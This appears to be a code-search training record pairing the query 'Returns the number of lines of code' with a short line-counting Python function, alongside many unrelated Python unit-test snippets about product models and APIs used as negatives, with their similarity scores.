cad_json,\n ],\n \"custom_attribute_values\": [{\n \"attribute_value\": \"new value\",\n \"custom_attribute_id\": cad.id,\n }],\n \"custom_attributes\": {\n cad.id: \"old value\",\n },\n \"contact\": {\n \"id\": pid,\n \"href\": \"/api/people/{}\".format(pid),\n \"type\": \"Person\"\n },\n \"title\": \"simple product\",\n \"description\": \"\",\n \"secondary_contact\": None,\n \"notes\": \"\",\n \"url\": \"\",\n \"reference_url\": \"\",\n \"slug\": \"\",\n \"context\": None\n }\n }\n ]\n\n response = self._post(product_data)\n ca_json = response.json[0][1][\"product\"][\"custom_attribute_values\"][0]\n self.assertEqual(ca_json[\"attribute_value\"], \"new value\")\n\n product = models.Product.eager_query().first()\n self.assertEqual(len(product.custom_attribute_values), 1)\n self.assertEqual(\n product.custom_attribute_values[0].attribute_value,\n \"new value\"\n )", "def test_defaults(self):\n p = Product.objects.create(\n name=\"Product\", slug=\"product\", sku=\"4711\", price=42.0)\n\n self.assertEqual(p.name, \"Product\")\n self.assertEqual(p.slug, \"product\")\n self.assertEqual(p.sku, \"4711\")\n self.assertEqual(p.price, 42.0)\n self.assertEqual(p.effective_price, 42.0)\n self.assertEqual(p.short_description, \"\")\n self.assertEqual(p.description, \"\")\n self.assertEqual(len(p.images.all()), 0)\n\n self.assertEqual(p.meta_title, \"<name>\")\n self.assertEqual(p.meta_description, \"\")\n self.assertEqual(p.meta_keywords, \"\")\n\n self.assertEqual(len(p.related_products.all()), 0)\n self.assertEqual(len(p.accessories.all()), 0)\n\n self.assertEqual(p.for_sale, False)\n self.assertEqual(p.for_sale_price, 0.0)\n self.assertEqual(p.active, False)\n\n self.assertEqual(p.deliverable, True)\n self.assertEqual(p.manual_delivery_time, False)\n self.assertEqual(p.delivery_time, None)\n self.assertEqual(p.order_time, None)\n self.assertEqual(p.ordered_at, None)\n self.assertEqual(p.manage_stock_amount, False)\n self.assertEqual(p.stock_amount, 0)\n\n self.assertEqual(p.weight, 0)\n self.assertEqual(p.height, 0)\n self.assertEqual(p.length, 0)\n self.assertEqual(p.width, 0)\n\n self.assertEqual(p.tax, None)\n self.assertEqual(p.sub_type, STANDARD_PRODUCT)\n\n self.assertEqual(p.default_variant, None)\n self.assertEqual(p.variants_display_type, LIST)\n\n self.assertEqual(p.parent, None)\n self.assertEqual(p.active_name, False)\n self.assertEqual(p.active_sku, False)\n self.assertEqual(p.active_short_description, False)\n self.assertEqual(p.active_description, False)\n self.assertEqual(p.active_price, False)\n self.assertEqual(p.active_images, False)\n self.assertEqual(p.active_related_products, False)\n self.assertEqual(p.active_accessories, False)\n self.assertEqual(p.active_meta_description, False)\n self.assertEqual(p.active_meta_keywords, False)", "def new_object_data(self):\n self.product_fixture = self.F.ProductFactory.create()\n modifiers = (self.datetime, self.resource_name)\n fields = {\n u\"name\": unicode(\"test_%s_%s\" % modifiers),\n u\"description\": unicode(\"test %s %s\" % modifiers),\n u\"product\": unicode(self.get_detail_url(\n \"product\", self.product_fixture.id)),\n u\"status\": unicode(\"draft\"),\n u\"created_by\": None,\n u\"modified_by\": None,\n u\"modified_on\": self.utcnow.strftime(\"%Y-%m-%d %H:%M:%S\"),\n }\n return fields", "def setUp(self):\n # Request the Product Id by posting it\n response = self.client.post('/api/productsdata/',\n data=json.dumps(self.product_payload),\n content_type=self.content_type)\n\n # Checking the response\n self.assertEqual(response.status_code, 201)\n self.assertEqual(response.json().get('name'), 'Olive Oil')\n\n # Storing ID for further test cases checking\n type(self).product_id = response.json().get('id')", "def test_data_object_vaporise(self):\n pass", "def test_custom_attribute_get(self):\n gen = self.generator.generate_custom_attribute\n _, cad = gen(\"product\", attribute_type=\"Text\", title=\"normal text\")\n pid = models.Person.query.first().id\n\n product_data = [\n {\n \"product\": {\n \"kind\": None,\n \"owners\": [],\n \"custom_attribute_values\": [{\n \"attribute_value\": \"my custom attribute value\",\n \"custom_attribute_id\": cad.id,\n }],\n \"contact\": {\n \"id\": pid,\n \"href\": \"/api/people/{}\".format(pid),\n \"type\": \"Person\"\n },\n \"title\": \"simple product\",\n \"description\": \"\",\n \"secondary_contact\": None,\n \"notes\": \"\",\n \"url\": \"\",\n \"reference_url\": \"\",\n \"slug\": \"\",\n \"context\": None\n }\n }\n ]\n\n response = self._post(product_data)\n product_url = response.json[0][1][\"product\"][\"selfLink\"]\n get_response = self.client.get(product_url)\n product = get_response.json[\"product\"]\n self.assertIn(\"custom_attribute_values\", product)\n self.assertEqual(len(product[\"custom_attribute_values\"]), 1)\n cav = product[\"custom_attribute_values\"][0]\n self.assertIn(\"custom_attribute_id\", cav)\n self.assertIn(\"attribute_value\", cav)\n self.assertIn(\"id\", cav)", "def test_create(self):\n self.assertEqual(Product.objects.count(), 2)\n payload = {\n 'name': 'New product',\n 'category': self.category_1.id,\n 'sku': '11111111',\n 'description': 'New product description',\n 'price': 39.99\n }\n\n headers = {\n 'HTTP_AUTHORIZATION': 'Token ' + str(self.token_admin)\n }\n response = self.client.post(\n '/api/products/', data=payload, content_type='application/json', **headers)\n self.assertEqual(response.status_code, 201)\n self.assertEqual(response['Content-Type'], 'application/json')\n self.assertEqual(Product.objects.count(), 3)\n\n product = Product.objects.get(name='New product')\n self.assertEqual(product.name, 'New product')\n self.assertEqual(product.category, self.category_1)\n self.assertEqual(product.sku, '11111111')\n self.assertEqual(product.description, 'New product description')\n self.assertEqual(float(product.price), 39.99)", "def test_01_product_create(self):\n # Create new product with a replacement product\n product = self.create_product()\n\n # Check recently was created product with default 'In Development'\n # value state and that the replacement was assigned. This case also\n # check the read test.\n self.assertTrue(product)\n self.assertEqual(product.state2, 'draft')\n self.assertTrue(product.replacement_product_ids)\n self.assertEqual(len(product.replacement_product_ids), 1)\n self.assertEqual(product.replacement_product_ids[0].id,\n self.ref('product_lifecycle.product_product_4e'))", "def test_model_saves_value_to_database( self ):\r\n\t\tretrieved_object = TestModel.objects.get( id = self.m_test_model.id )\r\n\t\tself.assertEqual( retrieved_object.custom_field, custom_data )", "def test_product_labels(self):\n\n prd = Product.objects.get(id=1)\n # label name\n label_name = prd._meta.get_field('name').verbose_name\n self.assertEqual(label_name, 'name')\n # label description\n label_name = prd._meta.get_field('description').verbose_name\n self.assertEqual(label_name, 'description')\n # label nutrition_grade\n label_name = prd._meta.get_field('nutrition_grade').name\n self.assertEqual(label_name, 'nutrition_grade')\n # label barcode\n label_name = prd._meta.get_field('barcode').verbose_name\n self.assertEqual(label_name, 'barcode')\n # label url\n label_name = prd._meta.get_field('url').verbose_name\n self.assertEqual(label_name, 'url')\n # label url_pic\n label_name = prd._meta.get_field('url_pic').name\n self.assertEqual(label_name, 'url_pic')\n # label store\n label_name = prd._meta.get_field('store').verbose_name\n self.assertEqual(label_name, 'store')\n # label prd_cat\n label_name = prd._meta.get_field('prd_cat').name\n self.assertEqual(label_name, 'prd_cat')\n # label fat\n label_name = prd._meta.get_field('fat').verbose_name\n self.assertEqual(label_name, 'fat')\n # label saturated_fat\n label_name = prd._meta.get_field('saturated_fat').name\n self.assertEqual(label_name, 'saturated_fat')\n # label sugar\n label_name = prd._meta.get_field('sugar').verbose_name\n self.assertEqual(label_name, 'sugar')\n # label salt\n label_name = prd._meta.get_field('salt').verbose_name\n self.assertEqual(label_name, 'salt')", "def test_product_nullables(self):\n self.assertIsNone(self.product3.main_image)\n self.assertIsNone(self.product3.protein)\n self.assertIsNone(self.product3.fat)\n self.assertIsNone(self.product3.carbs)\n self.assertIsNone(self.product3.calories)", "def test_fieldValueTypes(self):\n # tests for \"method\" and \"datetime\" values follow later on ...\n # booleans are not tested yet\n\n factory = self.root.manage_addProduct['Formulator']\n factory.manage_add('form', 'ValueTest')\n factory.manage_add('form2', 'ValueTest')\n form = self.root.form\n form.manage_addField('int_field', 'Test Integer Field', 'IntegerField')\n form.manage_addField('float_field', 'Test Float Field', 'FloatField')\n form.manage_addField('date_field', 'Test Date Field', 'DateTimeField')\n form.manage_addField('list_field', 'Test List Field', 'ListField')\n form.manage_addField(\n 'multi_field',\n 'Test Checkbox Field',\n 'MultiCheckBoxField')\n form.manage_addField('link_field', 'Test Link Field', 'LinkField')\n form.manage_addField('empty_field', 'Test Empty Field', 'StringField')\n int_field = form.int_field\n float_field = form.float_field\n date_field = form.date_field\n list_field = form.list_field\n multi_field = form.multi_field\n link_field = form.link_field\n empty_field = form.empty_field\n\n # XXX editing fields by messing with a fake request\n # -- any better way to do this?\n # (could assign to \"values\" directly ...)\n\n default_values = {'field_title': 'Test Title',\n 'field_display_width': '92',\n 'field_required': 'checked',\n 'field_enabled': 'checked',\n }\n try:\n form_values = default_values.copy()\n form_values.update({'field_default': 'None',\n 'field_required': '',\n })\n empty_field.manage_edit(REQUEST=TestRequest(form=form_values))\n\n form_values = default_values.copy()\n form_values.update({'field_default': '42',\n 'field_enabled': 'checked'})\n int_field.manage_edit(REQUEST=TestRequest(form=form_values))\n\n form_values = default_values.copy()\n form_values.update({'field_default': '1.7'})\n float_field.manage_edit(REQUEST=TestRequest(form=form_values))\n\n # XXX cannot test \"defaults to now\", as this may fail randomly\n form_values = default_values.copy()\n form_values.update({'field_input_style': 'list',\n 'field_input_order': 'mdy',\n 'field_date_only': '',\n 'field_css_class': 'test_css',\n 'field_time_separator': '$'})\n date_field.manage_edit(REQUEST=TestRequest(form=form_values))\n\n form_values = default_values.copy()\n form_values.update({'field_default': 'foo',\n 'field_size': '1',\n 'field_items': 'Foo | foo\\n Bar | bar'})\n list_field.manage_edit(REQUEST=TestRequest(form=form_values))\n\n form_values = default_values.copy()\n form_values.update(\n {'field_default': 'foo',\n 'field_size': '3',\n 'field_items': 'Foo | foo\\n Bar | bar\\nBaz | baz',\n 'field_orientation': 'horizontal',\n 'field_view_separator': '<br />\\n'})\n multi_field.manage_edit(REQUEST=TestRequest(form=form_values))\n\n form_values = default_values.copy()\n form_values.update({'field_default': 'http://www.absurd.org',\n 'field_required': '1',\n 'field_check_timeout': '5.0',\n 'field_link_type': 'external',\n })\n link_field.manage_edit(REQUEST=TestRequest(form=form_values))\n\n except ValidationError as e:\n self.fail('error when editing field %s; error message: %s' %\n (e.field_id, e.error_text))\n\n form2 = self.root.form2\n\n xml = formToXML(form)\n XMLToForm(xml, form2)\n\n self.assertEqualForms(form, form2)\n\n request = TestRequest()\n request.form['field_int_field'] = '42'\n request.form['field_float_field'] = '2.71828'\n request.form['subfield_date_field_month'] = '11'\n request.form['subfield_date_field_day'] = '11'\n # This field only allows ten years in the future, today 2023-03-14\n request.form['subfield_date_field_year'] = '2033'\n request.form['subfield_date_field_hour'] = '09'\n request.form['subfield_date_field_minute'] = '59'\n request.form['field_list_field'] = 'bar'\n request.form['field_multi_field'] = ['bar', 'baz']\n request.form['field_link_field'] = 'http://www.zope.org'\n try:\n result1 = form.validate_all(request)\n except FormValidationError as e:\n # XXX only render first error ...\n self.fail('error when editing form1, field %s; error message: %s' %\n (e.errors[0].field_id, e.errors[0].error_text))\n\n try:\n result2 = form2.validate_all(request)\n except FormValidationError as e:\n # XXX only render first error ...\n self.fail('error when editing form1, field %s; error message: %s' %\n (e.errors[0].field_id, e.errors[0].error_text))\n self.assertEqual(result1, result2)\n self.assertEqual(42, result2['int_field'])\n self.assertEqual(2.71828, result2['float_field'])\n\n # check link field timeout value\n self.assertEqual(link_field.get_value('check_timeout'),\n form2.link_field.get_value('check_timeout'))\n\n # XXX not tested: equal form validation failure on invalid input", "def test_add_new_product(self):\n response=self.add_new_product()\n result = json.loads(response.data.decode('utf-8'))\n self.assertEqual(response.status_code, 201, result['New Product'])", "def test_get_attribute_data(self):\n pass", "def test_custom_attribute_post_old(self):\n gen = self.generator.generate_custom_attribute\n _, cad = gen(\"product\", attribute_type=\"Text\", title=\"normal text\")\n cad_json = builder.json.publish(cad.__class__.query.get(cad.id))\n cad_json = builder.json.publish_representation(cad_json)\n pid = models.Person.query.first().id\n\n product_data = [\n {\n \"product\": {\n \"kind\": None,\n \"owners\": [],\n \"custom_attribute_definitions\":[\n cad_json,\n ],\n \"custom_attribute_values\": [{\n \"id\": 1,\n \"href\": \"/api/custom_attribute_values/1\",\n \"type\": \"CustomAttributeValues\"\n }],\n \"custom_attributes\": {\n cad.id: \"old value\",\n },\n \"contact\": {\n \"id\": pid,\n \"href\": \"/api/people/{}\".format(pid),\n \"type\": \"Person\"\n },\n \"title\": \"simple product\",\n \"description\": \"\",\n \"secondary_contact\": None,\n \"notes\": \"\",\n \"url\": \"\",\n \"reference_url\": \"\",\n \"slug\": \"\",\n \"context\": None\n }\n }\n ]\n\n response = self._post(product_data)\n self.assert200(response)\n ca_json = response.json[0][1][\"product\"][\"custom_attribute_values\"][0]\n self.assertEqual(ca_json[\"attribute_value\"], \"old value\")\n\n product = models.Product.eager_query().first()\n self.assertEqual(len(product.custom_attribute_values), 1)\n self.assertEqual(\n product.custom_attribute_values[0].attribute_value,\n \"old value\"\n )", "def test_create_product(self):\n url = reverse('products:list')\n data = {\n 'name': 'Banana',\n 'description': '''\n Bananas are one of the most widely consumed fruits in the\n world for good reason. Eating them could help lower blood\n pressure and reduce the risks of cancer and asthma.\n '''\n }\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(models.Product.objects.filter(name=data['name']).count(), 1)", "def test_default_product_price(self):\n prod = product('Test Product')\n self.assertEqual(prod.price, 10)\n self.assertEqual(prod.weight, 20)", "def setUp(self):\n super(TestProductLifecycle, self).setUp()\n self.sellable_product = self.ref('product.product_product_4c')\n self.obsolete_product = self.ref('product.product_product_4b')\n self.draft_product = self.ref('product.product_product_4')\n self.sellable_replacement = self.ref(\n 'product_lifecycle.product_product_4g')\n self.obsolete_replacement = self.ref(\n 'product_lifecycle.product_product_4f')\n self.product_obj = self.env['product.product']\n self.order_obj = self.env['purchase.order']\n self.imd_obj = self.env['ir.model.data']\n self.wiz_obj = self.env['replacement.product']", "def test_create_product_success(self):\n res = self.client.post(PRODUCTS_URL, PRODUCT_PAYLOAD)\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n self.assertEqual(res.data['supplier_id'], self.user.id)\n self.assertEqual(res.data['name'], PRODUCT_PAYLOAD['name'])\n self.assertEqual(res.data['price'], PRODUCT_PAYLOAD['price'])", "def test_create_product(self):\n obj1 = Product.objects.first()\n obj2 = Product.objects.last()\n\n expected_str1 = f\"{obj1.code} -- {obj1.name} -- \" \\\n f\"{obj1.schedule} -- {obj1.spl}\"\n self.assertEqual(str(obj1), expected_str1)\n self.assertNotEqual(str(obj2), expected_str1)", "def test_data_object_post(self):\n pass", "def test_changedata(self):\n p = model.Person(firstname=\"Tobias\", lastname=\"Thelen\",\n email=\"tthelen@uos.de\", hobbies=[\"singen\",\"springen\",\"fröhlichsein\"])\n id = p.store()\n\n p = model.Person(id=id)\n p['firstname'] = \"Walter\"\n p.store()\n\n p2 = model.Person(id=id)\n self.assertEqual(p2.firstname, \"Walter\")\n self.assertEqual(p2.lastname, \"Thelen\")", "def attribute(self, data, model, model_name):", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)\n self.assertEqual(prod.weight, 20)\n self.assertEqual(prod.flammability, 0.5)", "def test_record(self):\n self.assertEqual(self.record.attrib['id'],\n 'nhc_def_conf_adt_user',\n 'Incorrect ID ')\n self.assertEqual(self.record.attrib['model'],\n 'res.users',\n 'Incorrect model')", "def setUp(self) -> None:\n self.default = Product('Test Product')\n self.tester = Product('Tester', price=15, weight=2)", "def test_create_drug_successful(self):\n generic = models.Generic.objects.create(\n generic_name=\"Lisinopril\"\n )\n print(type(generic))\n drug = models.Drug.objects.create(\n product_id='12345',\n generic_name=generic,\n product_ndc=\"99999-9999\",\n brand_name=\"Zestril\"\n )\n\n self.assertEqual(str(drug), f\"{drug.product_id} {drug.product_ndc}\")", "def test_create_record(self):\n pass", "def test_add_product(self):\n view = ProductCreateListView.as_view({'post': 'create'})\n uri = reverse('products:create/list-products')\n data = {\n \"name\": \"Iphone 7\",\n \"description\": \"Mobile phone\",\n \"price\": 200,\n \"is_available\": True\n }\n request = self.factory.post(uri, data, HTTP_AUTHORIZATION='Token {}'.format(self.token_admin.key))\n request.user = self.user['admin']\n response = view(request)\n self.assertEqual(response.status_code, 201,\n f'Expected Response Code 201, received {response.status_code} instead.')", "def test_product_is_saved_on_creation(self):\n self.assertEquals(self.prod_1.image, 'product_default.png')", "def test_insert_data(self):\n self.engine.insert_data(self.correct_camper_data)\n self.assertDictEqual(\n self.ds.store,\n {\n 3: Camper(**{\n \"id\": 3,\n \"latitude\": 38.7436883,\n \"longitude\": -9.1952226,\n \"price_per_day\": 85.5,\n \"weekly_discount\": 0.25\n })\n })", "def test_attr(self):\n new_review = Review()\n self.assertTrue(hasattr(new_review, \"id\"))\n self.assertTrue(hasattr(new_review, \"created_at\"))\n self.assertTrue(hasattr(new_review, \"updated_at\"))\n self.assertTrue(hasattr(new_review, \"place_id\"))\n self.assertTrue(hasattr(new_review, \"user_id\"))\n self.assertTrue(hasattr(new_review, \"text\"))", "def test_create_basic_recipe(self):\n payload = {\"title\": \"Vietnamese Cake\",\n \"time_minutes\": 45,\n \"price\": 5.55}\n res = self.client.post(RECIPE_URL, payload)\n recipe = Recipe.objects.get(id=res.data['id'])\n for key in payload.keys():\n if key == \"price\":\n self.assertEqual(round(Decimal(payload[key]), 2), getattr(recipe, key))\n else:\n self.assertEqual(payload[key], getattr(recipe, key))\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)", "def test_cannot_make_sale_with_wrong_datatypes(self):\n reply = self.admin_add_product()\n\n resp = self.admin_create_user()\n reply = self.attendant_login()\n token = reply['token']\n sale = dict(products = [\n {\n \"prod_name\":\"NY_345\", \n \"quantity\":'Kummi'\n }\n\t ])\n resp = self.client.post(\n '/api/v1/sales',\n content_type='application/json',\n data=json.dumps(sale),\n headers={'Authorization': 'Bearer {}'.format(token)}\n )\n reply = json.loads(resp.data.decode())\n \n self.assertEqual(reply['message'], 'prod_name & quantity should be a character & number respectively!')\n self.assertEqual(resp.status_code, 400)", "def test_category_model_entry(self): # PRUEBA DE CARGAR LA INFORMACION EN LOS MODELOS A TESTEAR\n data = self.data1\n self.assertTrue(isinstance(data, Category)) # REALIZA EL TESTEO ", "def test_attr(self):\n self.assertTrue(hasattr(BaseModel, \"__str__\"))\n self.assertTrue(hasattr(BaseModel, \"save\"))\n self.assertTrue(hasattr(BaseModel, \"to_dict\"))\n self.assertTrue(\"updated_at\" in self.my_model1.__dict__)\n self.assertTrue(\"created_at\" in self.my_model1.__dict__)\n self.assertTrue(\"id\" in self.my_model1.__dict__)", "def test_add_new_product(self):\n self._require_login(self.user1)\n post_data = {\n \"category\": {\n \"name\": \"deportes\",\n \"index\": 1\n },\n \"price\": \"4500.0\",\n \"name\": \"Producto 3\",\n \"description\": \"Descripcion de producto 3\"\n }\n\n response = self.client.post('/api/1.0/products/', data=post_data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertNotEqual(response.data['published_date'], '')\n self.assertEqual(response.data['name'], 'Producto 3')\n self.assertEqual(response.data['description'], 'Descripcion de producto 3')\n self.assertEqual(response.data['selling'], True)\n self.assertEqual(response.data['price'], '4500.0')\n self.assertEqual(response.data['seller']['user']['username'], self.username)\n self.assertEqual(response.data['category']['name'], 'deportes')", "def test_default_product_price(self):\r\n prod = Product('Test Product')\r\n self.assertEqual(prod.price, 10)", "def test_get_attributes(self):\n pass", "def setup(self):\n print(\"INIT DATA\")\n\n self.nutella = Product.objects.create(name=\"nutella\", nutriscore=\"e\")", "def test_get_item(self):\n self.assertEqual(self.expected_described_model, self.mapped_model[\"described_model_type\"])", "def test_record(self):\n self.assertEqual(self.record.attrib['id'],\n 'nhc_demo_patient_0',\n 'Incorrect ID ')\n self.assertEqual(self.record.attrib['model'],\n 'nh.clinical.patient',\n 'Incorrect model')", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_update_product(self):\n data = {\n 'pk': 1,\n 'name': 'New yogurt',\n 'description': '''\n Yogurt also spelled yoghurt, yogourt or yoghourt,\n is a food produced by bacterial fermentation of milk.\n '''\n }\n url = reverse('products:detail', kwargs={'pk': data['pk']})\n response = self.client.patch(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(models.Product.objects.filter(name=data['name']).count(), 1)", "def test_required_field_values_are_present():\n\n model_definition = {'language': {'type': 'fixed',\n 'required': True,\n 'persisted': True},\n 'source': {'type': 'list',\n 'required': False,\n 'persisted': True},\n 'resources.title': {'type': 'text',\n 'required': True,\n 'persisted': True}}\n product1 = {'language': 'english'}\n factory = ProductModelFactory(model_definition)\n factory.build('product1', product1)", "def test_update_record(self):\n pass", "def test_create_product_successful(self):\n \n ProductCategory.objects.create(name=\"test name\", description=\"new name\")\n test_key = ProductCategory.objects.values()[0]\n # print(test_key)\n payload = {\n 'name': 'Test Tag',\n 'product_category_id': test_key.get('id'),\n 'unit_price': 100,\n 'quantity': 12,\n 'description': 'Test description'\n }\n \n res = self.client.post(PRODUCT_ADD_URL, payload)\n\n # print(res.data)\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)", "def test_default_prodct(self):\n prod = Product(\"default\")\n self.assertEqual(prod.price, 10)\n self.assertAlmostEqual(prod.flammability, 0.5)\n self.assertEqual(prod.weight, 20)\n self.assertEqual(prod.stealability(), \"Kinda stealable.\")", "def test_create_valid_product(self):\n product_name = \"Swift Iris\"\n size = Size.SIZE_4_5\n colour = \"Red\"\n price = 47.00\n product_type = ProductType.SHOE\n product_code = \"A\"\n department = Department.LADIES\n\n product = Product(\n name=product_name,\n size=size,\n colour=colour,\n price=price,\n product_type=product_type,\n product_code=product_code,\n department=department,\n )\n with self.assertRaises(ValidationError):\n product.full_clean()", "def test_get_additional_seller_inputs(self):\n pass", "def test_missing_mandatory_attributes():\n model_definition = {'source': {'type': 'list',\n 'required': True,\n 'persisted': True},\n 'resources.title': {'type': 'text',\n 'required': True,\n 'persisted': True}}\n # missing language in the model\n _ = ProductModelFactory(model_definition)", "def test_new_attribute_data(db_session):\n new_att = Attribute(\n label=\"test_label\",\n desc=\"test_desc\"\n )\n db_session.add(new_att)\n att = db_session.query(Attribute).all()\n assert att[0].label == \"test_label\"\n assert att[0].desc == \"test_desc\"", "def test_books_model_entry(self):\n data = self.data1\n self.assertTrue(isinstance(data,Books))", "def test_model_keeps_value( self ):\r\n\t\tself.assertEqual( self.m_test_model.custom_field, custom_data )", "def test_admin_create_product(self):\n resp = self.admin_register()\n reply = self.admin_login()\n token = reply['token']\n product = dict(\n prod_name='NY_denims',\n category='denims',\n stock=20,\n price=150\n )\n resp = self.client.post(\n '/api/v1/products',\n content_type='application/json',\n data=json.dumps(product),\n headers={'Authorization': 'Bearer {}'.format(token)}\n )\n reply = json.loads(resp.data.decode())\n \n self.assertEqual(reply['message'], 'Product successfully added to Inventory!')\n self.assertEqual(resp.status_code, 201)", "def test_update_product_success(self):\n product = sample_product(supplier_id=self.user, name='old-name', price='100.00')\n url = detail_url(product.id)\n new_product = {\n 'name': 'new_name',\n 'price': '1000.0',\n 'image': ''\n }\n res = self.client.put(url, new_product)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data['name'], new_product['name'])", "def test_model_allows_assigning_data_after_creation( self ):\r\n\t\tanother_data = { \"another_meta\" : \"another_value\" }\r\n\t\tself.m_test_model.custom_field = another_data\r\n\t\tself.m_test_model.save();\r\n\r\n\t\t# First test that the same model has assigned value\r\n\t\tself.assertEqual( self.m_test_model.custom_field, another_data )\r\n\r\n\t\t# Now test that retrieved model from database persists the value\r\n\t\tretrieved_object = TestModel.objects.get( id = self.m_test_model.id )\r\n\t\tself.assertEqual( retrieved_object.custom_field, another_data )", "def test_generate_data_model():\n params = dict(name=\"test\", type_=str, is_required=True)\n\n data_model = DataModel(\"test\", [Attribute(**params)])\n\n assert generate_data_model(\"test\", {\"test\": \"str\"}) == data_model", "def test_process_data(self):\n pass", "def test_model_field_types(self):\n self.assertTrue(isinstance(self.UserInfo.have_siblings, str))\n self.assertTrue(isinstance(self.UserInfo.known_env_exposures, str))\n self.assertTrue(isinstance(self.UserInfo.known_genetic_mutations, str))\n self.assertTrue(isinstance(self.UserInfo.age, int))", "def test_items(self):\n self.assertEqual([(\"described_model_type\", self.expected_described_model)], list(self.mapped_model.items()))", "def test_create_same_product(self):\n url = reverse('products:list')\n data = {\n 'name': 'Eggs',\n 'description': '''\n Bird and reptile eggs consist of a protective eggshell,\n albumen (egg white), and vitellus (egg yolk),\n contained within various thin membranes.\n The most commonly consumed eggs are chicken eggs.\n Other poultry eggs including those of duck and quail\n also are eaten.\n '''\n }\n product_count_before = models.Product.objects.count()\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(models.Product.objects.count(), product_count_before)", "def test_category_model_entry(self):\n data = self.data1\n self.assertEqual(str(data), 'django')", "def test_set_fields():\n\n document = DocumentFactory.create(\n charfield=\"some chars\",\n textfield=\"some text\",\n decimalfield=0.0815,\n integerfield=42,\n )\n\n assert document.charfield == \"some chars\"\n assert document.textfield == \"some text\"\n assert document.decimalfield == 0.0815\n assert document.integerfield == 42", "def test_form_submition_and_product_creation(user_company, client, authenticated_user):\n add_product_url = reverse('add-product')\n response = client.post(add_product_url, {\n 'name': 'Test_product_name',\n 'serial_number': 'XZ001', \n 'manufacturer': 'Test company',\n 'price_net': 415.26,\n 'description': fake.paragraph(),\n 'stock': 16\n })\n assert response.status_code == 302\n product = Product.objects.get(name='Test_product_name')\n assert response.url == reverse('product-detail',kwargs={'pk': product.pk}) \n assert product.user == authenticated_user\n assert product in Product.objects.all()", "def test_default_product_weight(self):\r\n prod = Product('Test Product')\r\n self.assertEqual(prod.weight, 20)", "def test_products_ref_users_put(self):\n pass", "def test_field_extra(self):\n setting_model = Setting()\n\n test_extra = {}\n setting_model.field_extra = test_extra\n self.assertEqual(setting_model.field_extra, test_extra)\n\n test_extra = {'min_lenght': 5, 'max_length': 12}\n setting_model.field_extra = test_extra\n self.assertEqual(setting_model.field_extra, test_extra)", "def test_set_data_attributes(self):\n\n self.mediator.get_results()", "def test_cannot_make_sale_with_missing_fields(self):\n reply = self.admin_add_product()\n\n resp = self.admin_create_user()\n reply = self.attendant_login()\n token = reply['token']\n sale = dict(products = [\n {\n \"prod_name\":\"\", \n \"quantity\":10\n }\n\t ])\n resp = self.client.post(\n '/api/v1/sales',\n content_type='application/json',\n data=json.dumps(sale),\n headers={'Authorization': 'Bearer {}'.format(token)}\n )\n reply = json.loads(resp.data.decode())\n \n self.assertEqual(reply['message'], 'One of the fields is empty!')\n self.assertEqual(resp.status_code, 400)", "def test_create_company_props_using_post(self):\n pass", "def test_product_delete(self):\n # first performe create\n id = self._create_model(\"product\", self.product_data, [\"name\", \"description\", \"image_link\", \"price\"])\n if id:\n # then performe delete\n self._delete_model(\"product\", id)\n self.assertIsNotNone(id)" ]
[ "0.76896816", "0.7435254", "0.74246174", "0.73524946", "0.71989226", "0.7134408", "0.6947085", "0.69248456", "0.68103576", "0.67975587", "0.67713046", "0.67241883", "0.6704033", "0.66982996", "0.6688978", "0.66654783", "0.66048956", "0.659939", "0.6586787", "0.6566571", "0.6554063", "0.6513096", "0.6509164", "0.64822984", "0.641744", "0.6379985", "0.6377534", "0.6374552", "0.6373689", "0.6363517", "0.6350085", "0.6348819", "0.6336803", "0.6336293", "0.63165945", "0.6303672", "0.6303636", "0.62850165", "0.6282031", "0.62724113", "0.6259483", "0.6241566", "0.6219104", "0.621844", "0.62161416", "0.62108874", "0.6199137", "0.61986864", "0.61771876", "0.61711776", "0.6156518", "0.61525047", "0.6148496", "0.61477834", "0.61300063", "0.6129734", "0.6116277", "0.6108904", "0.61040914", "0.6092237", "0.60846055", "0.60846055", "0.60846055", "0.60846055", "0.60846055", "0.60846055", "0.60846055", "0.60846055", "0.60846055", "0.60846055", "0.60846055", "0.607855", "0.60598606", "0.6054412", "0.6053824", "0.6043676", "0.60415584", "0.6039986", "0.603894", "0.60306025", "0.60221636", "0.60196185", "0.60159147", "0.60134304", "0.6012753", "0.6008091", "0.6007396", "0.6005517", "0.5996955", "0.59947175", "0.5994533", "0.5991163", "0.5988958", "0.5985996", "0.5985604", "0.5985519", "0.59737134", "0.5971817", "0.5950741", "0.59409916" ]
0.7449101
1
Returns the number of lines of code
def get_line_count(blob): return len(blob.split('\n'))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
